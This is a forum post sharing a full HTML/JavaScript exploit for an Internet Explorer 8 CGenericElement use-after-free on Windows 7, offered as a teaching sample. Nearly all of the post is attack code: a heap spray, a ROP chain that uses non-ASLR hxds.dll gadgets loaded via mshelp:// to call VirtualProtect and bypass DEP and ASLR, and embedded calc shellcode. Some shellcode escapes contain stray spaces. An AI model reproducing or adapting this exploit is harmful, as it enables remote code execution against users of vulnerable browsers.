PDA

View Full Version : Developers Holocaust with IE 8 CGenericElement win7..."vinnu"



"vinnu"
06-29-2013, 01:23 PM
Namaste

The following is the CGenericElement exploit using mshelp:// protocol if Visual studio <2010 is installed,
and is a good sample for beginners of exploitation specially ROP chain generation and ASLR+DEP bypass:




<!--
Exploit Title: "Developers Holocaust".
Developer : "vinnu"
Team : "Legion Of Xtremers"
ASLR+DEP bypass : "mshelp://" protocol can be used if Visual Studio below 2010 is installed.
It loads non ASLR module hxds.dll:
Base=51BC0000
Size=000D7000 (880640.)
Entry=51BDA1D4 hxds.<ModuleEntryPoint>
Name=hxds
File version=2.05.50727.42 (RTM.050727-4200)
Path=C:\Program Files (x86)\Common Files\Microsoft Shared\Help\hxds.dll
Special Thanx: Garage4Hackers, happy_t3rmin4t0r,l0rd_D34thst0rm,b0nd,fb1h2s...
-->
<!doctype html>
<head>
<script>
var virtable = "alfabetagammad\u1020\u0c10".substring(0x0e,0x20);//"alfabetagammad\u1020\u0c10".substring(0x0e,0x20);
function paint() {
var highlim = 300;//1600;
var bsize = 0x040000;var redzone = 0x20//0x48;
var halloween = "\uC876\u51BD"//"\u0102\u0103" // pop eax;ret
+"\u105a\u0c10"//"\u0104\u0105"// popped in eax
+"\u3838\u51C0"//"\u0106\u0107"// and word ptr ds:[eax],0;xor eax,eax,ret8;
+"\uC876\u51BD"//"\u0108\u0109"//pop eax,ret
+"\u010a\u010b"
+"\u110b\u110c"
+"\u105e\u0c10"//"\u010e\u010f"// popped in eax
+"\u3838\u51C0"//"\u0110\u0111"// and word ptr ds:[eax],0;xor eax,eax,ret8;
+"\uC876\u51BD"//"\u0112\u0113"// pop eax,ret
+"\u1114\u1115"
+"\u111c\u111d"
+"\u1158\u51BC"//"\u1158\u51BC"//"\u111e\u111f"// popped in eax : &VirtualProtect.
+"\uD6B0\u51BC"//"\u10a0\u0c10"//"\u1120\u1121" // call [eax];pop edi;pop esi;ret10
+"\u1094\u0c10"//"\u1122\u1123" // Address
+"\u4096\u1123"//"\u1122\u1123" // Size
+"\u0040\u1125"//"\u1124\u1125"// PAGE_READWRITE_EXECUTE
+"\u1020\u0c10"//"\u1126\u1127" // OldProtection
+"\u1128\u1129"
+"\u112a\u112b"
+"\u1094\u0c10"//"\u112c\u112d" // ASLR Bypassed, goto Shellcode.
+"\u112e\u112f"
+"\u1130\u1131"
+"\u1132\u1133"
+"\u1134\u1135"
+"\u1136\u1137"
+"\u1138\u1139"
+"\u113a\u113b"
+"\u113c\u113d"
+"\u27bf\u51bc"//"\u113e\u113f" // xchg eax,esp;ret
/* +"\u1140\u1141"
+"\u1142\u1143"
+"\u1144\u1145"
+"\u1146\u1147"
+"\u116b\u116c"
+"\u116d\u116e"
+"\u116f\u1170"
+"\u1171\u1172"
+"\u1173\u1174"
+"\u1175\u1176"
+"\u1177\u1178"
+"\u1179\u117a"
*/ //Shellcode
// Calc shellcode:
+"\u9191\u9191\u9191\u9191\uceba\u11fa\u291f\ub1c9\u db33\ud9ce\u2474\u5ef4\u5631\u030e\u0e56\u0883\uf3 fe\u68ea\u7a17\u9014\u1de8\u759c\u0fd9\ufefa\u8048 \u5288\u6b61\u46dc\u19f2\u69c9\u94b3\u442f\u1944\u 0af0\u3b86\u508c\u9bdb\u9bad\udd2e\uc1ea\u8fc1\u8e a3\u2070\ud2c7\u4148\u5907\u39f0\u9d22\uf385\ucd2d \u8f36\uf566\ud73d\u0456\u0b91\u4faa\uf89e\u4e58\u 3176\u61a0\u9eb6\u4e9f\ude3b\u68d8\u95a4\u8b12\uae 59\uf6e0\u3b85\u50f5\u9b4d\u61dd\u7a82\u6d95\u086f \u71f1\udd6e\u8d89\ue0fb\u045d\uc6bf\u4d79\u661b\u 2bdb\u97ca\u933b\u3db3\u3137\u44a7\u5f1a\uc436\u26 20\ud638\u082a\ue751\uc7a1\uf826\uac63\u1ac9\ud8a6 \u8361\u6123\u34ec\ua59e\ub709\u552b\ua7ee\u5059\u 6faa\u28b1\u05a3\u9fb5\u0fc4\u7ed6\ud357\ue537\u76 df\u4148";
/* +"\ucccc\ucccc\ucccc\ucccc\u4141\u4141"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB";
*/
while(halloween.length < 0x200) {halloween += virtable;}
airbreeze = halloween.substring(0,0x100);
while (airbreeze.length<0x60000) {airbreeze += airbreeze}
var ropway = airbreeze.substring(0, 0x40000 - redzone);
var greenCodec = new Array();
for (var iter=0;iter<highlim;iter++){
greenCodec.push(document.createElement("div"));
}
for (var iter=0;iter<highlim;iter++){
greenCodec[iter].className = ropway;
}
}
function ignite() {
// var sobj = document.createElement("img");
// sobj.src="ms-help://MS.VSCC.v80/MS.Dexplore.v80.en/dv_dexplore/html/92b51076-8841-45a2-8e2b-9165146c5c23.htm";
// document.body.appendChild(sobj);
var alfa = new Array();
var nsize = 0x20;
for(var as=0;as<0x1000;as++) {
alfa.push(document.createElement("div"));
}
f0 = document.createElement('span');
document.body.appendChild(f0);
f1 = document.createElement('span');
document.body.appendChild(f1);
f2 = document.createElement('span');
document.body.appendChild(f2);
document.body.contentEditable="true";
f2.appendChild(document.createElement('datalist')) ;
f1.appendChild(document.createElement('span'));
f1.appendChild(document.createElement('table'));
try{
f0.offsetParent=null;
}catch(e) {}
f2.innerHTML="";
f0.appendChild(document.createElement('hr'));
f1.innerHTML="";
CollectGarbage();
a = document.getElementById('myanim');

for(var as = 0;as<100/*0x1000*/;as++) {
alfa[as].title = unescape("%u1020%u0c10"/*"%u4140%u4141*/+"%u4142%u4143%u4144%u4145%u4146%u4147%u4148%u4149%u 414a%u414b%u414c%u414d%u414e%u414f%u4151%u4152%u41 53%u4154%u4155%u4156%u4157%u4158%u4159%u415a%u415b").substr(0,nsize);
}
paint();

alert(1);
// window.location.reload();
//[0x5FFF031C]
a.values = alfa[4].title;
}
function returnTrue() {return true;}
</script>
</head>
<body onload="eval(ignite());">
<t:ANIMATECOLOR id="myanim"/>
<script src="ms-help://MS.VSCC.v80/MS.Dexplore.v80.en/dv_dexplore/html/92b51076-8841-45a2-8e2b-9165146c5c23.htm" onerror="returnTrue();" />
</body>
</html>
<!------Call Flow:
113f113e
01020103
01060107
01090108
01110110
01120113
011f011e
112d112c :->ASLR Bypassed.
-------->




..."vinnu"